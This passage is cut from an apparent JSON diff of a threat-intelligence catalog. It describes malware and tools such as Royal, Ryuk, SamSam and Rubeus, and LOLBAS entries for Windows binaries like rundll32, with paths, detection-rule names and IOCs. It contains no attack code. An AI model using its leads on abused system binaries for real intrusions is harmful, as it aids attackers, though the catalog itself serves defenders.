[Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) attacks and noted a possible connection between their operators.[[Microsoft Royal ransomware November 2022](https://app.tidalcyber.com/references/91efc6bf-e15c-514a-96c1-e838268d222f)][[Cybereason Royal December 2022](https://app.tidalcyber.com/references/28aef64e-20d3-5227-a3c9-e657c6e2d07e)][[Kroll Royal Deep Dive February 2023](https://app.tidalcyber.com/references/dcdcc965-56d0-58e6-996b-d8bd40916745)][[Trend Micro Royal Linux ESXi February 2023](https://app.tidalcyber.com/references/e5bb846f-d11f-580c-b96a-9de4ba5eaed6)][[CISA Royal AA23-061A March 2023](https://app.tidalcyber.com/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1073", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + }, + { + "dest-uuid": "802a874d-7463-4f2a-99e3-6a1f5a919a21", + "type": "similar" + } + ], + "uuid": "221e24cb-910f-5988-9473-578ef350870c", + "value": "Royal" + }, + { + "description": "[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]", + "meta": { + "id": "840f79a4-5fd6-4d83-bd6e-7776debc391e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3e42b791-fb59-4a8e-a27e-1cc544f353ee", + "type": "similar" + } + ], + "uuid": "86869abd-b428-4415-91be-d5413eeac0b5", + "value": "Rpcping.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to verify rpc connection\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\rpcping.exe\n* C:\\Windows\\SysWOW64\\rpcping.exe\n\n**Resources:**\n* [https://github.com/vysec/RedTips](https://github.com/vysec/RedTips)\n* [https://twitter.com/vysecurity/status/974806438316072960](https://twitter.com/vysecurity/status/974806438316072960)\n* [https://twitter.com/vysecurity/status/873181705024266241](https://twitter.com/vysecurity/status/873181705024266241)\n* [https://twitter.com/splinter_code/status/1421144623678988298](https://twitter.com/splinter_code/status/1421144623678988298)\n\n**Detection:**\n* Sigma: [proc_creation_win_rpcping_credential_capture.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml)[[Rpcping.exe - LOLBAS Project](/references/dc15a187-4de7-422e-a507-223e89e317b1)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5155", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "86869abd-b428-4415-91be-d5413eeac0b5", + "type": "similar" + } + ], + "uuid": "3e42b791-fb59-4a8e-a27e-1cc544f353ee", + "value": "Rpcping" + }, + { + "description": "Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.[[GitHub rsockstun](/references/1644457f-75d6-4064-a11b-9217249fa5e6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5076", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + } + ], + "uuid": "c3b9281b-5f18-4119-903e-c27f1a4004b4", + "value": "Rsockstun" + }, + { + "description": "[[Unit42 Redaman January 2019](https://app.tidalcyber.com/references/433cd55a-f912-4d5a-aff6-92133d08267b)]", + "meta": { + "id": "5d88a89c-6688-48c9-a463-6ca64652101c" + }, + "related": [ + { + "dest-uuid": "1836485e-a3a6-4fae-a15d-d0990788811a", + "type": "similar" + } + ], + "uuid": "eca6bc18-bb6c-473e-b034-8362ead4e250", + "value": "Redaman" + }, + { + "description": "[RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd)). Newer versions of the malware have been reported publicly as Redaman.[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)][[Unit42 Redaman January 2019](https://app.tidalcyber.com/references/433cd55a-f912-4d5a-aff6-92133d08267b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0148", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "666ab5f0-3ef1-4e74-8a10-65c60a7d1acd", + "type": "used-by" + }, + { + "dest-uuid": "92ec0cbd-2c30-44a2-b270-73f4ec949841", + "type": "similar" + }, + { + "dest-uuid": "eca6bc18-bb6c-473e-b034-8362ead4e250", + "type": "similar" + } + ], + "uuid": "1836485e-a3a6-4fae-a15d-d0990788811a", + "value": "RTM" + }, + { + "description": "[Rubeus](https://app.tidalcyber.com/software/2e54f40c-ab62-535e-bbab-3f3a835ff55a) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.[[GitHub Rubeus March 2023](https://app.tidalcyber.com/references/4bde7ce6-7fc6-5660-a8aa-745f19350ee1)][[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)][[DFIR Ryuk's Return October 2020](https://app.tidalcyber.com/references/eba1dafb-ff62-4d34-b268-3b9ba6a7a822)][[DFIR Ryuk 2 Hour Speed Run November 2020](https://app.tidalcyber.com/references/3b904516-3b26-4caa-8814-6e69b76a7c8c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1071", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "e33267fe-099f-4af2-8730-63d49f8813b2", + "type": "similar" + } + ], + "uuid": "2e54f40c-ab62-535e-bbab-3f3a835ff55a", + "value": "Rubeus" + }, + { + "description": "[Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://app.tidalcyber.com/software/69563cbd-7dc1-4396-b576-d5886df11046) have also released a defensive tool, NotRuler, to detect its usage.[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)][[SensePost NotRuler](https://app.tidalcyber.com/references/1bafe35e-f99c-4aa9-8b2f-5a35970ec83b)]", + "meta": { + "platforms": [ + "Office 365", + "Windows" + ], + "software_attack_id": "S0358", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "type": "similar" + } + ], + "uuid": "69563cbd-7dc1-4396-b576-d5886df11046", + "value": "Ruler" + }, + { + "description": "[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]", + "meta": { + "id": "3d01d0ad-ace4-4db3-a35e-ff9fc893364e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "cd5a27c8-9611-41d9-b839-b0ba7daf58b5", + "type": "similar" + } + ], + "uuid": "8919f626-0b08-4d5c-9872-b95a10b5e06b", + "value": "Rundll32.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute dll files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\rundll32.exe\n* C:\\Windows\\SysWOW64\\rundll32.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/](https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/)\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n* [https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/](https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/)\n* [https://github.com/sailay1996/expl-bin/blob/master/obfus.md](https://github.com/sailay1996/expl-bin/blob/master/obfus.md)\n* [https://github.com/sailay1996/misc-bin/blob/master/rundll32.md](https://github.com/sailay1996/misc-bin/blob/master/rundll32.md)\n* [https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90](https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90)\n* [https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code](https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code)\n\n**Detection:**\n* Sigma: [net_connection_win_rundll32_net_connections.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Elastic: [defense_evasion_unusual_network_connection_via_rundll32.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml)\n* IOC: Outbount Internet/network connections made from rundll32\n* IOC: Suspicious use of cmdline flags such as -sta[[Rundll32.exe - LOLBAS Project](/references/90aff246-ce27-4f21-96f9-38543718ab07)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5156", + "source": "Tidal Cyber", + "tags": [ + "d28b269e-588d-49ed-b5c9-8e82077924c0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "used-by" + }, + { + "dest-uuid": "8919f626-0b08-4d5c-9872-b95a10b5e06b", + "type": "similar" + } + ], + "uuid": "cd5a27c8-9611-41d9-b839-b0ba7daf58b5", + "value": "Rundll32" + }, + { + "description": "[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]", + "meta": { + "id": "d8755de5-f49f-4b1d-91bc-350e19ea9ba8", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd", + "type": "similar" + } + ], + "uuid": "e45aa3ea-628a-4b78-ae7c-bc9c9bf0c2fa", + "value": "Runexehelper.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Launcher process\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\runexehelper.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1206692239839289344](https://twitter.com/0gtweet/status/1206692239839289344)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_runexehelper.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml)\n* IOC: c:\\windows\\system32\\runexehelper.exe is run\n* IOC: Existence of runexewithargs_output.txt file[[Runexehelper.exe - LOLBAS Project](/references/86ff0379-2b73-4981-9f13-2b02b53bc90f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5157", + "source": "Tidal Cyber", + "tags": [ + "270a347d-d2e1-4d46-9b32-37e8d7264301", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e45aa3ea-628a-4b78-ae7c-bc9c9bf0c2fa", + "type": "similar" + } + ], + "uuid": "db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd", + "value": "Runexehelper" + }, + { + "description": "[RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0). [[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0253", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "60d50676-459a-47dd-92e9-a827a9fe9c58", + "type": "similar" + } + ], + "uuid": "e8afda1f-fa83-4fc3-b6fb-7d5daca7173f", + "value": "RunningRAT" + }, + { + "description": "[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]", + "meta": { + "id": "355cd948-1c27-4686-8d9f-e1b0f484fc40", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ccad36ac-b526-44ec-840a-6f498c51781c", + "type": "similar" + } + ], + "uuid": "1879fe72-07da-461e-8f70-af95440b65de", + "value": "Runonce.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Executes a Run Once Task that has been configured in the registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\runonce.exe\n* C:\\Windows\\SysWOW64\\runonce.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/990717080805789697](https://twitter.com/pabraeken/status/990717080805789697)\n* [https://cmatskas.com/configure-a-runonce-task-on-windows/](https://cmatskas.com/configure-a-runonce-task-on-windows/)\n\n**Detection:**\n* Sigma: [registry_event_runonce_persistence.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml)\n* Sigma: [proc_creation_win_runonce_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml)\n* Elastic: [persistence_run_key_and_startup_broad.toml](https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml)\n* IOC: Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY[[Runonce.exe - LOLBAS Project](/references/b97d4b16-ead2-4cc7-90e5-f8b05d84faf3)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5158", + "source": "Tidal Cyber", + "tags": [ + "065db33d-c152-4ba9-8bf9-13616f78ae05", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1879fe72-07da-461e-8f70-af95440b65de", + "type": "similar" + } + ], + "uuid": "ccad36ac-b526-44ec-840a-6f498c51781c", + "value": "Runonce" + }, + { + "description": "[[Runscripthelper.exe - LOLBAS Project](/references/6d7151e3-685a-4dc7-a44d-aefae4f3db6a)]", + "meta": { + "id": "843e7ee6-ecd9-43b4-8b54-491c8217e842", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "035bae51-c1cc-46f0-8532-a5d01c4d4a52", + "type": "similar" + } + ], + "uuid": "f5e4afa0-6094-4fd1-8472-a459b5687cc9", + "value": "Runscripthelper.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute target PowerShell script\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe\n* C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe\n\n**Resources:**\n* [https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc](https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_runscripthelper.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Event 4014 - Powershell logging\n* IOC: Event 400[[Runscripthelper.exe - LOLBAS Project](/references/6d7151e3-685a-4dc7-a44d-aefae4f3db6a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5159", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f5e4afa0-6094-4fd1-8472-a459b5687cc9", + "type": "similar" + } + ], + "uuid": "035bae51-c1cc-46f0-8532-a5d01c4d4a52", + "value": "Runscripthelper" + }, + { + "description": "[Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://app.tidalcyber.com/software/8ae86854-4cdc-49eb-895a-d1fa742f7974) shares code similarities with Hermes ransomware.[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)][[FireEye Ryuk and Trickbot January 2019](https://app.tidalcyber.com/references/b29dc755-f1f0-4206-9ecf-29257a1909ee)][[FireEye FIN6 Apr 2019](https://app.tidalcyber.com/references/e8a2bc6a-04e3-484e-af67-5f57656c7206)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0446", + "source": "MITRE", + "tags": [ + "12a2e20a-7c27-46bb-954d-b372833a9925", + "c2380542-36f2-4922-9ed2-80ced06645c9", + "c8ce7130-e134-492c-a98a-ed1d25b57e4c", + "2743d495-7728-4a75-9e5f-b64854039792", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "a020a61c-423f-4195-8c46-ba1d21abba37", + "type": "similar" + } + ], + "uuid": "8ae86854-4cdc-49eb-895a-d1fa742f7974", + "value": "Ryuk" + }, + { + "description": "[Saint Bot](https://app.tidalcyber.com/software/d66e5d18-e9f5-4091-bdf4-acdac129e2e0) is a .NET downloader that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.[[Malwarebytes Saint Bot April 2021](https://app.tidalcyber.com/references/3a1faa47-7bd3-453f-9b7a-bb17efb8bb3c)][[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1018", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "used-by" + }, + { + "dest-uuid": "7724581b-06ff-4d2b-b77c-80dc8d53070b", + "type": "similar" + } + ], + "uuid": "d66e5d18-e9f5-4091-bdf4-acdac129e2e0", + "value": "Saint Bot" + }, + { + "description": "", + "meta": { + "id": "95fe4b6f-6f73-4bab-aaa9-c9747935dcb9" + }, + "related": [ + { + "dest-uuid": "a316c704-144a-4d14-8e4e-685bb6ae391c", + "type": "similar" + } + ], + "uuid": "8e87c30d-7a04-431a-9182-8991ed0e4464", + "value": "Sakurel" + }, + { + "description": "", + "meta": { + "id": "2ba6d620-2bd1-402f-8145-15ccaf107c73" + }, + "related": [ + { + "dest-uuid": "a316c704-144a-4d14-8e4e-685bb6ae391c", + "type": "similar" + } + ], + "uuid": "b27db543-4db8-4cf6-9321-c511efa7ecb7", + "value": "VIPER" + }, + { + "description": "[Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [[Dell Sakula](https://app.tidalcyber.com/references/e9a2ffd8-7aed-4343-8678-66fc3e758d19)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0074", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "96b08451-b27a-4ff6-893f-790e26393a8e", + "type": "similar" + }, + { + "dest-uuid": "8e87c30d-7a04-431a-9182-8991ed0e4464", + "type": "similar" + }, + { + "dest-uuid": "b27db543-4db8-4cf6-9321-c511efa7ecb7", + "type": "similar" + } + ], + "uuid": "a316c704-144a-4d14-8e4e-685bb6ae391c", + "value": "Sakula" + }, + { + "description": "[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)]", + "meta": { + "id": "76ac471b-b15c-4072-9e08-38bc62aaac92" + }, + "related": [ + { + "dest-uuid": "88831e9f-453e-466f-9510-9acaa1f20368", + "type": "similar" + } + ], + "uuid": "accecc38-6a70-4fe4-97a2-86df1e07dbcb", + "value": "Samas" + }, + { + "description": "[SamSam](https://app.tidalcyber.com/software/88831e9f-453e-466f-9510-9acaa1f20368) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[[US-CERT SamSam 2018](https://app.tidalcyber.com/references/b9d14fea-2330-4eed-892c-b4e05a35d273)][[Talos SamSam Jan 2018](https://app.tidalcyber.com/references/0965bb64-be96-46b9-b60f-6829c43a661f)][[Sophos SamSam Apr 2018](https://app.tidalcyber.com/references/4da5e9c3-7205-4a6e-b147-be7c971380f0)][[Symantec SamSam Oct 2018](https://app.tidalcyber.com/references/c5022a91-bdf4-4187-9967-dfe6362219ea)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0370", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4d56e6e9-1a6d-46e3-896c-dfdf3cc96e62", + "type": "similar" + }, + { + "dest-uuid": "accecc38-6a70-4fe4-97a2-86df1e07dbcb", + "type": "similar" + } + ], + "uuid": "88831e9f-453e-466f-9510-9acaa1f20368", + "value": "SamSam" + }, + { + "description": "[Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) is a backdoor written in C and C++ that is known to be used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f), as early as August 2021 to target a financial institution in the United States. [Sardonic](https://app.tidalcyber.com/software/9ab0d523-3496-5e64-9ca1-bb756f5e64e0) has a plugin system that can load specially made DLLs and execute their functions.[[Bitdefender Sardonic Aug 2021](https://app.tidalcyber.com/references/8e9d05c9-6783-5738-ac85-a444810a8074)][[Symantec FIN8 Jul 2023](https://app.tidalcyber.com/references/9b08b7f0-1a33-5d76-817f-448fac0d165a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1085", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "0c52f5bc-557d-4083-bd27-66d7cdb794bb", + "type": "similar" + } + ], + "uuid": "9ab0d523-3496-5e64-9ca1-bb756f5e64e0", + "value": "Sardonic" + }, + { + "description": "[[Sc.exe - LOLBAS Project](/references/5ce3ef73-f789-4939-a60e-e0a373048bda)]", + "meta": { + "id": "d0649c70-e746-4f1a-a31b-fbf519ca80da", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "41be663f-ecc9-4ab6-afeb-c52737f84858", + "type": "similar" + } + ], + 